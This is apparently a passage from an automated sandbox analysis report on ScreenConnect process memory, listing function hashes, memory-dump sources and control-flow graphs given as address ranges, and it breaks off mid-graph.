                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3574186429.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_add000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 6db90e9342d936add7677834a16b04f553401bef964d800028ad41c8ddaf67c8
                                                                                                                                                                      • Instruction ID: 35a4624c9dccb7333f59ea093902d07495d18b5a04c624dbd608d753f9b8a42b
                                                                                                                                                                      • Opcode Fuzzy Hash: 6db90e9342d936add7677834a16b04f553401bef964d800028ad41c8ddaf67c8
                                                                                                                                                                      • Instruction Fuzzy Hash: 4901A271408340AAE7109B29CD84B67BFA8EF85324F18C52BED5B5A386C279D845C6B1
                                                                                                                                                                      Function 00ADD005 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000007.00000002.3574186429.0000000000ADD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ADD000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_7_2_add000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: d30b2be454879309ceb704bb0040dabfd6a4beb2eeee9163ae6ee0537ace116e
                                                                                                                                                                      • Instruction ID: 0f8f82626652a95f3a61db20b797a310fc136945b5dbb18ed387e90b2c9fed28
                                                                                                                                                                      • Opcode Fuzzy Hash: d30b2be454879309ceb704bb0040dabfd6a4beb2eeee9163ae6ee0537ace116e
                                                                                                                                                                      • Instruction Fuzzy Hash: 2A015E7100E3C09ED7128B258C94B52BFB4EF53224F19C1DBD8898F2A3C2699849C7B2

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:11%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:0%
                                                                                                                                                                      Total number of Nodes:5
                                                                                                                                                                      Total number of Limit Nodes:1
                                                                                                                                                                      execution_graph 18523 7ffd9b2f8014 18525 7ffd9b2f801d 18523->18525 18524 7ffd9b2f8082 18525->18524 18526 7ffd9b2f80f6 SetProcessMitigationPolicy 18525->18526 18527 7ffd9b2f8152 18526->18527

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FFD9B606AD6 Relevance: 1.9, Strings: 1, Instructions: 632COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 164 7ffd9b606ad6-7ffd9b606b04 call 7ffd9b600c40 * 2 170 7ffd9b606b0a-7ffd9b606b18 164->170 171 7ffd9b60789e-7ffd9b6078b1 164->171 173 7ffd9b606b1a-7ffd9b606b1c 170->173 174 7ffd9b606b1e-7ffd9b606b2d call 7ffd9b604930 170->174 176 7ffd9b606b30-7ffd9b606b32 173->176 174->176 178 7ffd9b606b38-7ffd9b606b54 176->178 179 7ffd9b606c72-7ffd9b606c75 176->179 178->179 198 7ffd9b606b5a-7ffd9b606b6c 178->198 180 7ffd9b606c7b-7ffd9b606c83 179->180 181 7ffd9b606db0-7ffd9b606db7 179->181 182 7ffd9b606c84-7ffd9b606c86 180->182 184 7ffd9b606e47-7ffd9b606e4e 181->184 185 7ffd9b606dbd-7ffd9b606dc4 181->185 186 7ffd9b606c88-7ffd9b606cb0 182->186 187 7ffd9b606cd2-7ffd9b606ce0 182->187 188 7ffd9b606e59-7ffd9b606e6c 184->188 189 7ffd9b606e50-7ffd9b606e57 184->189 185->184 190 7ffd9b606dca-7ffd9b606dd4 185->190 186->182 212 7ffd9b606cb2-7ffd9b606cd0 186->212 187->181 206 7ffd9b606e6e-7ffd9b606e73 188->206 207 7ffd9b606e7d-7ffd9b606e85 188->207 189->188 193 7ffd9b606e96-7ffd9b606e9d 189->193 190->193 200 7ffd9b606dda-7ffd9b606e23 190->200 196 7ffd9b606ea3-7ffd9b606eaa 193->196 197 7ffd9b607101-7ffd9b607108 193->197 196->197 201 7ffd9b606eb0-7ffd9b606eb3 196->201 197->171 203 7ffd9b60710e-7ffd9b607115 197->203 204 7ffd9b606bba-7ffd9b606c45 198->204 205 7ffd9b606b6e-7ffd9b606b8b 198->205 210 7ffd9b606ebc-7ffd9b606eca 201->210 211 7ffd9b606eb5-7ffd9b606eb7 201->211 203->171 213 7ffd9b60711b-7ffd9b60712d 203->213 264 7ffd9b606c48-7ffd9b606c66 204->264 222 7ffd9b6078b2-7ffd9b6078cc 205->222 223 7ffd9b606b91-7ffd9b606bb8 205->223 206->207 215 7ffd9b606e8b-7ffd9b606e8f 207->215 216 7ffd9b6078f1-7ffd9b607922 207->216 234 7ffd9b606ecc 210->234 235 7ffd9b606ece 210->235 218 7ffd9b606f6a-7ffd9b606f6d 211->218 212->187 220 7ffd9b607179-7ffd9b607191 213->220 221 7ffd9b60712f-7ffd9b60714c 213->221 215->193 227 7ffd9b606f76-7ffd9b606f84 218->227 228 7ffd9b606f6f-7ffd9b606f71 218->228 238 7ffd9b607152-7ffd9b607177 221->238 239 7ffd9b6078df-7ffd9b6078f0 221->239 284 7ffd9b6078cd-7ffd9b6078d5 222->284 223->204 257 7ffd9b606f88 227->257 258 7ffd9b606f86 227->258 237 7ffd9b607025-7ffd9b60702b 228->237 246 7ffd9b606ed0-7ffd9b606ed3 234->246 235->246 242 7ffd9b607031-7ffd9b607033 237->242 243 7ffd9b6070dd-7ffd9b6070df 237->243 238->220 239->216 242->243 249 7ffd9b607039-7ffd9b60705b 242->249 243->197 250 7ffd9b6070e1-7ffd9b6070e9 243->250 254 7ffd9b606ed5-7ffd9b606edb 246->254 255 7ffd9b606edd-7ffd9b606ee8 246->255 292 7ffd9b60705f-7ffd9b607090 249->292 250->197 262 7ffd9b6070eb-7ffd9b6070fd 250->262 266 7ffd9b606f58-7ffd9b606f63 254->266 267 7ffd9b606eea-7ffd9b606f07 255->267 268 7ffd9b606f34-7ffd9b606f55 255->268 259 7ffd9b606f8a-7ffd9b606f8d 257->259 258->259 270 7ffd9b606f97-7ffd9b606fa2 259->270 271 7ffd9b606f8f-7ffd9b607023 259->271 262->197 287 7ffd9b606c68-7ffd9b606c70 264->287 288 7ffd9b606c67 264->288 274 7ffd9b606f66-7ffd9b606f68 266->274 267->284 285 7ffd9b606f0d-7ffd9b606f32 267->285 268->266 278 7ffd9b606fa4-7ffd9b606faf 270->278 279 7ffd9b606fee-7ffd9b606ffe 270->279 271->237 274->218 278->274 291 7ffd9b606fb1-7ffd9b606fc1 278->291 296 7ffd9b6078d6-7ffd9b6078de 284->296 285->268 287->179 287->264 288->287 295 7ffd9b606fc7-7ffd9b606fec 291->295 291->296 305 7ffd9b607092-7ffd9b6070db 292->305 295->279 296->239 305->197
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: E
                                                                                                                                                                      • API String ID: 0-3568589458
                                                                                                                                                                      • Opcode ID: 748c7fbb6488babcfcd715866cda8e75f1644f0954ff2270d4cc2ecf0efc25ee
                                                                                                                                                                      • Instruction ID: 74e8a41df24b9a48fc8d74628094cc6d1fd97b1f39a8399f697d8e1b10890dd9
                                                                                                                                                                      • Opcode Fuzzy Hash: 748c7fbb6488babcfcd715866cda8e75f1644f0954ff2270d4cc2ecf0efc25ee
                                                                                                                                                                      • Instruction Fuzzy Hash: F9126861B0EA4E4FE7759A6A44702B47BD2EF56344F0A01BED4EDCB1E7DD28B9028341
                                                                                                                                                                      Function 00007FFD9B60A53F Relevance: 1.8, Instructions: 1812COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: dbfeffee08e23db8856d7bab6c020c417957dc5d5de72a700447138a7d5ec65f
                                                                                                                                                                      • Instruction ID: 2cae9e8bd8bf5650736dda963dbfc8208b58de1c967e8d3148e38d9fa9cddcd8
                                                                                                                                                                      • Opcode Fuzzy Hash: dbfeffee08e23db8856d7bab6c020c417957dc5d5de72a700447138a7d5ec65f
                                                                                                                                                                      • Instruction Fuzzy Hash: CAE24C30A0961D8FDBA8DB69C8A4BA8B7F1FF59300F1541F9D45DD72A1DA34AE81CB40
                                                                                                                                                                      Function 00007FFD9B607193 Relevance: .7, Instructions: 688COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1437 7ffd9b607193-7ffd9b60719e 1438 7ffd9b6071a4-7ffd9b6071bc 1437->1438 1439 7ffd9b607241-7ffd9b607247 1437->1439 1438->1439 1445 7ffd9b6071c2-7ffd9b6071c3 1438->1445 1440 7ffd9b60789e-7ffd9b6078b1 1439->1440 1441 7ffd9b60724d-7ffd9b607255 1439->1441 1443 7ffd9b607257-7ffd9b607260 1441->1443 1444 7ffd9b60729d-7ffd9b6072a5 1441->1444 1449 7ffd9b60726a-7ffd9b607296 1443->1449 1444->1440 1447 7ffd9b6072ab-7ffd9b6072b6 1444->1447 1448 7ffd9b6071c6-7ffd9b60722c 1445->1448 1447->1449 1453 7ffd9b6072b8-7ffd9b60746c 1447->1453 1465 7ffd9b607239-7ffd9b60723f 1448->1465 1466 7ffd9b60722e-7ffd9b607234 call 7ffd9b606308 1448->1466 1449->1444 1491 7ffd9b607473-7ffd9b60750a 1453->1491 1465->1439 1465->1448 1466->1465 1495 7ffd9b60750c-7ffd9b60750e 1491->1495 1496 7ffd9b607510-7ffd9b607511 1491->1496 1497 7ffd9b607518-7ffd9b607525 1495->1497 1496->1497 1498 7ffd9b60755b 1497->1498 1499 7ffd9b607527-7ffd9b60753f 1497->1499 1500 7ffd9b60755f-7ffd9b607562 1498->1500 1507 7ffd9b607541-7ffd9b607556 1499->1507 1508 7ffd9b60755d 1499->1508 1501 7ffd9b607575-7ffd9b607578 1500->1501 1502 7ffd9b607564-7ffd9b607571 1500->1502 1505 7ffd9b60757a-7ffd9b60757b 1501->1505 1506 7ffd9b607582-7ffd9b6075ab 1501->1506 1502->1501 1509 7ffd9b607573 1502->1509 1505->1506 1514 7ffd9b6075b2-7ffd9b607649 1506->1514 1507->1491 1508->1500 1509->1501 1518 7ffd9b60764b-7ffd9b60764d 1514->1518 1519 7ffd9b60764f-7ffd9b607650 1514->1519 1520 7ffd9b607657-7ffd9b607664 1518->1520 1519->1520 1521 7ffd9b60769a 1520->1521 1522 7ffd9b607666-7ffd9b60767e 1520->1522 1523 7ffd9b60769e-7ffd9b6076a1 1521->1523 1530 7ffd9b60769c 1522->1530 1531 7ffd9b607680-7ffd9b607695 1522->1531 1524 7ffd9b6076b4-7ffd9b6076b7 1523->1524 1525 7ffd9b6076a3-7ffd9b6076b0 1523->1525 1528 7ffd9b6076b9-7ffd9b6076ba 1524->1528 1529 7ffd9b6076c1-7ffd9b60771f call 7ffd9b606118 1524->1529 1525->1524 1532 7ffd9b6076b2 1525->1532 1528->1529 1539 7ffd9b607721-7ffd9b607724 1529->1539 1540 7ffd9b607790-7ffd9b6077a2 1529->1540 1530->1523 1531->1514 1532->1524 1542 7ffd9b607726-7ffd9b60777f call 7ffd9b606318 call 7ffd9b606328 call 7ffd9b606128 1539->1542 1543 7ffd9b6077a5-7ffd9b6077ac 1539->1543 1540->1543 1554 7ffd9b607780-7ffd9b60778d 1542->1554 1544 7ffd9b6078e8-7ffd9b607922 1543->1544 1545 7ffd9b6077ad-7ffd9b6077b7 1543->1545 1553 7ffd9b6077b9-7ffd9b6077d7 1545->1553 1545->1554 1557 7ffd9b6077d9-7ffd9b6077e7 1553->1557 1554->1557 1558 7ffd9b60778f 1554->1558 1557->1440 1558->1540
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: a2dbb72ded7dd60f3d96e6185e63f06efc7663dc746ec1dae0ba281deeed2198
                                                                                                                                                                      • Instruction ID: 9e9a2e760a06026e6563d3380dd751758ff01c85445e7bdfc13f0338c972a038
                                                                                                                                                                      • Opcode Fuzzy Hash: a2dbb72ded7dd60f3d96e6185e63f06efc7663dc746ec1dae0ba281deeed2198
                                                                                                                                                                      • Instruction Fuzzy Hash: F2222671B0DA4A4FEBA8EF298465A7577D1FFA5340F0400BED09ECB2A6DE24B841C741
                                                                                                                                                                      Function 00007FFD9B607CF8 Relevance: .7, Instructions: 651COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1566 7ffd9b607cf8-7ffd9b607d3c 1570 7ffd9b607d86-7ffd9b607d96 1566->1570 1571 7ffd9b607d3e-7ffd9b607d5a 1566->1571 1578 7ffd9b607d9c-7ffd9b607daa call 7ffd9b604930 1570->1578 1579 7ffd9b607d98-7ffd9b607d9a 1570->1579 1572 7ffd9b608168-7ffd9b608186 call 7ffd9b600c40 * 2 1571->1572 1573 7ffd9b607d60-7ffd9b607d7e call 7ffd9b600c40 * 2 1571->1573 1588 7ffd9b608292-7ffd9b60829d 1572->1588 1589 7ffd9b60818c-7ffd9b608193 1572->1589 1590 7ffd9b607d84-7ffd9b607d85 1573->1590 1591 7ffd9b607ffe 1573->1591 1582 7ffd9b607dad-7ffd9b607dc2 1578->1582 1579->1582 1593 7ffd9b607dc8-7ffd9b607dec call 7ffd9b604980 * 2 1582->1593 1594 7ffd9b607dc4-7ffd9b607dc6 1582->1594 1595 7ffd9b608195-7ffd9b6081a4 1589->1595 1596 7ffd9b6081a6-7ffd9b6081a8 1589->1596 1590->1570 1597 7ffd9b608004-7ffd9b60801c call 7ffd9b600c40 * 2 1591->1597 1598 7ffd9b607def-7ffd9b607e04 1593->1598 1594->1598 1595->1596 1606 7ffd9b6081aa 1595->1606 1601 7ffd9b6081af-7ffd9b6081d3 1596->1601 1617 7ffd9b608046-7ffd9b608064 call 7ffd9b600c40 * 2 1597->1617 1618 7ffd9b60801e-7ffd9b608028 1597->1618 1612 7ffd9b607e0a-7ffd9b607e2e call 7ffd9b604980 * 2 1598->1612 1613 7ffd9b607e06-7ffd9b607e08 1598->1613 1614 7ffd9b60821f-7ffd9b60822d 1601->1614 1615 7ffd9b6081d5-7ffd9b6081f2 1601->1615 1606->1601 1619 7ffd9b607e31-7ffd9b607e46 1612->1619 1613->1619 1614->1588 1625 7ffd9b60829e-7ffd9b608317 1615->1625 1626 7ffd9b6081f8-7ffd9b60821d 1615->1626 1644 7ffd9b60806a-7ffd9b608075 1617->1644 1645 7ffd9b60811b-7ffd9b608126 1617->1645 1622 7ffd9b60803c 1618->1622 1623 7ffd9b60802a-7ffd9b60803a 1618->1623 1633 7ffd9b607e4c-7ffd9b607e63 call 7ffd9b604980 1619->1633 1634 7ffd9b607e48-7ffd9b607e4a 1619->1634 1629 7ffd9b60803e-7ffd9b60803f 1622->1629 1623->1629 1650 7ffd9b608360-7ffd9b6083b6 1625->1650 1651 7ffd9b608319-7ffd9b60835d 1625->1651 1626->1614 1629->1617 1640 7ffd9b607e73-7ffd9b607e81 1633->1640 1634->1640 1652 7ffd9b607e87-7ffd9b607e95 call 7ffd9b604930 1640->1652 1653 7ffd9b607e83-7ffd9b607e85 1640->1653 1657 7ffd9b608077-7ffd9b608079 1644->1657 1658 7ffd9b60807b-7ffd9b60808a call 7ffd9b604930 1644->1658 1659 7ffd9b608128-7ffd9b60812a 1645->1659 1660 7ffd9b60812c-7ffd9b60813b call 7ffd9b604930 1645->1660 1680 7ffd9b6083b8-7ffd9b6083b9 1650->1680 1681 7ffd9b6083bc-7ffd9b6083e0 1650->1681 1703 7ffd9b60835e 1651->1703 1656 7ffd9b607e98-7ffd9b607ea1 1652->1656 1653->1656 1683 7ffd9b607ea8-7ffd9b607eaf 1656->1683 1666 7ffd9b60808d-7ffd9b6080c1 1657->1666 1658->1666 1667 7ffd9b60813e-7ffd9b608140 1659->1667 1660->1667 1666->1645 1678 7ffd9b6080c3-7ffd9b6080c8 1666->1678 1667->1588 1674 7ffd9b608146-7ffd9b608158 1667->1674 1684 7ffd9b6080cb-7ffd9b6080d1 1678->1684 1680->1681 1696 7ffd9b608412-7ffd9b60841b 1681->1696 1697 7ffd9b6083e2-7ffd9b6083f1 1681->1697 1683->1591 1686 7ffd9b607eb5-7ffd9b607ebc 1683->1686 1687 7ffd9b6080d3-7ffd9b6080db 1684->1687 1688 7ffd9b6080e4-7ffd9b6080ec 1684->1688 1686->1591 1692 7ffd9b607ec2-7ffd9b607ed9 1686->1692 1693 7ffd9b6080ed-7ffd9b6080ee 1687->1693 1695 7ffd9b6080dd-7ffd9b6080e2 1687->1695 1688->1693 1694 7ffd9b6080fe 1688->1694 1706 7ffd9b607edb-7ffd9b607eed 1692->1706 1707 7ffd9b607f0e-7ffd9b607f19 1692->1707 1698 7ffd9b6080f3-7ffd9b6080fd call 7ffd9b607a28 1693->1698 1699 7ffd9b608104-7ffd9b608119 1694->1699 1695->1698 1701 7ffd9b6083f3-7ffd9b6083f4 1697->1701 1702 7ffd9b6083f7-7ffd9b608411 1697->1702 1698->1699 1699->1645 1699->1684 1701->1702 1703->1703 1715 7ffd9b607ef3-7ffd9b607f01 call 7ffd9b604930 1706->1715 1716 7ffd9b607eef-7ffd9b607ef1 1706->1716 1712 7ffd9b607f1b-7ffd9b607f1d 1707->1712 1713 7ffd9b607f1f-7ffd9b607f2e call 7ffd9b604930 1707->1713 1719 7ffd9b607f31-7ffd9b607f33 1712->1719 1713->1719 1717 7ffd9b607f04-7ffd9b607f07 1715->1717 1716->1717 1717->1707 1722 7ffd9b607f39-7ffd9b607f50 1719->1722 1723 7ffd9b607fe8-7ffd9b607ffa 1719->1723 1722->1723 1727 7ffd9b607f56-7ffd9b607f73 1722->1727 1723->1591 1730 7ffd9b607f75-7ffd9b607f7d 1727->1730 1731 7ffd9b607f7f 1727->1731 1732 7ffd9b607f81-7ffd9b607f83 1730->1732 1731->1732 1732->1723 1734 7ffd9b607f85-7ffd9b607f8f 1732->1734 1735 7ffd9b607f91-7ffd9b607f9b call 7ffd9b604bb8 1734->1735 1736 7ffd9b607f9d-7ffd9b607fa5 1734->1736 1735->1591 1735->1736 1738 7ffd9b607fa7-7ffd9b607fb2 1736->1738 1739 7ffd9b607fd3-7ffd9b607fe6 call 7ffd9b607a18 1736->1739 1738->1597 1744 7ffd9b607fb4-7ffd9b607fcc call 7ffd9b606240 1738->1744 1739->1591 1744->1739
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 4db949af4e9852429c46881ea1f1d796a16c5da230c4c9d8a6b0106c9488b8b4
                                                                                                                                                                      • Instruction ID: 84e7dae20cf786a3c60128bab64afc533b1504b660cae59d5e96059bed93ee40
                                                                                                                                                                      • Opcode Fuzzy Hash: 4db949af4e9852429c46881ea1f1d796a16c5da230c4c9d8a6b0106c9488b8b4
                                                                                                                                                                      • Instruction Fuzzy Hash: A312F521B0FA4E4FE7B9D7AA84746B977D2EF96340F160079D0ADCB1E2DD28B9058341
                                                                                                                                                                      Function 00007FFD9B2F8014 Relevance: 1.7, APIs: 1, Instructions: 179COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3600749818.00007FFD9B2F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B2F0000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b2f0000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: MitigationPolicyProcess
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1088084561-0
                                                                                                                                                                      • Opcode ID: e1b184f2909cebf0fe57c86dcf2edca1022b5c8fc5835375e52e263642db1fc5
                                                                                                                                                                      • Instruction ID: 586095030b4efc74baf8ef07e94ab46425e6d4a16c0139995b944f3182738217
                                                                                                                                                                      • Opcode Fuzzy Hash: e1b184f2909cebf0fe57c86dcf2edca1022b5c8fc5835375e52e263642db1fc5
                                                                                                                                                                      • Instruction Fuzzy Hash: AF514B31E0DB498FDB249FA8985A9E97BE0EF55310F04017FE049C3292DF68A946CBD1
                                                                                                                                                                      Function 00007FFD9B600715 Relevance: .9, Instructions: 878COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1079 7ffd9b600715-7ffd9b600741 1080 7ffd9b600743-7ffd9b600748 1079->1080 1081 7ffd9b600780-7ffd9b600781 1079->1081 1082 7ffd9b600782-7ffd9b6007d9 1080->1082 1083 7ffd9b60074a-7ffd9b60077f 1080->1083 1081->1082 1093 7ffd9b6007db-7ffd9b6007f1 1082->1093 1094 7ffd9b600817-7ffd9b600830 1082->1094 1083->1081 1098 7ffd9b600872-7ffd9b605786 1094->1098 1099 7ffd9b600832-7ffd9b600850 1094->1099 1105 7ffd9b605788-7ffd9b6057a9 1098->1105 1106 7ffd9b6057b1-7ffd9b6057e4 1098->1106 1110 7ffd9b600893-7ffd9b6008a1 1099->1110 1111 7ffd9b600852-7ffd9b600871 1099->1111 1105->1106 1107 7ffd9b6057ea-7ffd9b6057f9 1106->1107 1108 7ffd9b605924-7ffd9b605953 1106->1108 1119 7ffd9b605804-7ffd9b605806 1107->1119 1112 7ffd9b605955-7ffd9b60595f call 7ffd9b604bb8 1108->1112 1113 7ffd9b6059a4-7ffd9b6059b8 1108->1113 1120 7ffd9b6008a3-7ffd9b600a49 1110->1120 1121 7ffd9b60088d-7ffd9b606ad2 1110->1121 1111->1098 1112->1113 1127 7ffd9b605961-7ffd9b605973 1112->1127 1117 7ffd9b6059ba-7ffd9b6059c4 1113->1117 1118 7ffd9b6059e8-7ffd9b6059f3 1113->1118 1117->1118 1123 7ffd9b6059c6-7ffd9b6059d7 1117->1123 1119->1108 1124 7ffd9b60580c-7ffd9b6058c6 1119->1124 1180 7ffd9b600a4b-7ffd9b600a7e 1120->1180 1181 7ffd9b600a85-7ffd9b600b20 1120->1181 1123->1118 1137 7ffd9b6059d9-7ffd9b6059e1 1123->1137 1124->1108 1159 7ffd9b6058c8-7ffd9b6058d8 1124->1159 1127->1113 1132 7ffd9b605975-7ffd9b60599f call 7ffd9b604e48 1127->1132 1132->1113 1137->1118 1159->1108 1160 7ffd9b6058da-7ffd9b60591f call 7ffd9b604e38 1159->1160 1160->1108 1180->1181 1192 7ffd9b600b83-7ffd9b600baa 1181->1192 1193 7ffd9b600b22-7ffd9b600b7e call 7ffd9b6008c0 * 2 1181->1193
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.3608139882.00007FFD9B600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B600000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_7ffd9b600000_ScreenConnect.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 71ef42984398d679f5883d036bdf1bc41648bfee1abbb358aa3c008755439a80
                                                                                                                                                                      • Instruction ID: f807658c2eddf63012061737ceef08aae7052d72f150acfb175ecfb3663a711f
                                                                                                                                                                      • Opcode Fuzzy Hash: 71ef42984398d679f5883d036bdf1bc41648bfee1abbb358aa3c008755439a80
                                                                                                                                                                      • Instruction Fuzzy Hash: DA52E436A0E7894FEBA9DE6EC4A09A077A0FF5271471501FAC0A9CF197DA25F846C740
                                                                                                                                                                      Function 00007FFD9B60000A Relevance: .6, Instructions: 633COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1747 7ffd9b60000a-7ffd9b60008e 1757 7ffd9b6000d8-7ffd9b6000dd 1747->1757 1758 7ffd9b600090-7ffd9b6000d7 1747->1758 1760 7ffd9b6000df-7ffd9b600100 1757->1760 1761 7ffd9b6000de 1757->1761 1758->1757 1766 7ffd9b600124-7ffd9b60013c 1760->1766 1767 7ffd9b600102-7ffd9b600121 1760->1767 1761->1760 1771 7ffd9b600160-7ffd9b60017e 1766->1771 1772 7ffd9b60013e-7ffd9b60015d 1766->1772 1767->1766 1775 7ffd9b60019a-7ffd9b6001a5 1771->1775 1776 7ffd9b600180-7ffd9b600198 1771->1776 1772->1771 1779 7ffd9b6001ab-7ffd9b6001b4 1775->1779 1780 7ffd9b60023e-7ffd9b600241 1775->1780 1776->1775 1782 7ffd9b6001b6-7ffd9b6001c3 1779->1782 1783 7ffd9b6001cd-7ffd9b6001d8 1779->1783 1784 7ffd9b600298-7ffd9b6002b6 1780->1784 1785 7ffd9b600243-7ffd9b60024d 1780->1785 1782->1783 1791 7ffd9b6001c5-7ffd9b6001cb 1782->1791 1787 7ffd9b6001da-7ffd9b6001f7 1783->1787 1788 7ffd9b600224-7ffd9b600238 1783->1788 1802 7ffd9b6002ba-7ffd9b6002c6 1784->1802 1803 7ffd9b600400-7ffd9b60041e 1784->1803 1792 7ffd9b600255-7ffd9b60026e 1785->1792 1795 7ffd9b6004e2-7ffd9b60053f 1787->1795 1796 7ffd9b6001fd-7ffd9b600222 1787->1796 1788->1780 1794 7ffd9b6004bd-7ffd9b6004df 1788->1794 1791->1783 1804 7ffd9b600270-7ffd9b600272 1792->1804 1805 7ffd9b6002df-7ffd9b6002ea 1792->1805 1794->1795 1830 7ffd9b60054b-7ffd9b600552 1795->1830 1831 7ffd9b600541-7ffd9b60054a 1795->1831 1796->1788 1808 7ffd9b6002cc-7ffd9b6002da 1802->1808 1809 7ffd9b6002c8-7ffd9b6002ca 1802->1809 1803->1794 1832 7ffd9b600424-7ffd9b60042e 1803->1832 1810 7ffd9b600274 1804->1810 1811 7ffd9b6002ee-7ffd9b6002fa 1804->1811 1812 7ffd9b6002eb-7ffd9b6002ec 1805->1812 1816 7ffd9b6002dd-7ffd9b6002de 1808->1816 1809->1816 1810->1802 1817 7ffd9b600276-7ffd9b60027a 1810->1817 1818 7ffd9b6002fc-7ffd9b6002fe 1811->1818 1819 7ffd9b600300-7ffd9b600301 1811->1819 1812->1811 1816->1805 1817->1812 1822 7ffd9b60027c-7ffd9b600281 1817->1822 1823 7ffd9b600311-7ffd9b600315 1818->1823 1820 7ffd9b600302-7ffd9b60030e 1819->1820 1820->1823 1822->1820 1828 7ffd9b600283-7ffd9b60028e 1822->1828 1825 7ffd9b600316-7ffd9b60032e 1823->1825 1841 7ffd9b600334-7ffd9b600342 1825->1841 1842 7ffd9b600330-7ffd9b600332 1825->1842 1833 7ffd9b600290-7ffd9b600295 1828->1833 1834 7ffd9b6002ff 1828->1834 1836 7ffd9b600554-7ffd9b60055d 1830->1836 1837 7ffd9b60055e-7ffd9b600569 1830->1837 1838 7ffd9b600434-7ffd9b600442 1832->1838 1839 7ffd9b600430-7ffd9b600432 1832->1839 1833->1825 1840 7ffd9b600297 1833->1840 1834->1819 1843 7ffd9b600445-7ffd9b600462 1838->1843 1839->1843 1840->1784 1845 7ffd9b600345-7ffd9b600362 1841->1845 1842->1845 1850 7ffd9b600468-7ffd9b600476 1843->1850 1851 7ffd9b600464-7ffd9b600466 1843->1851 1853 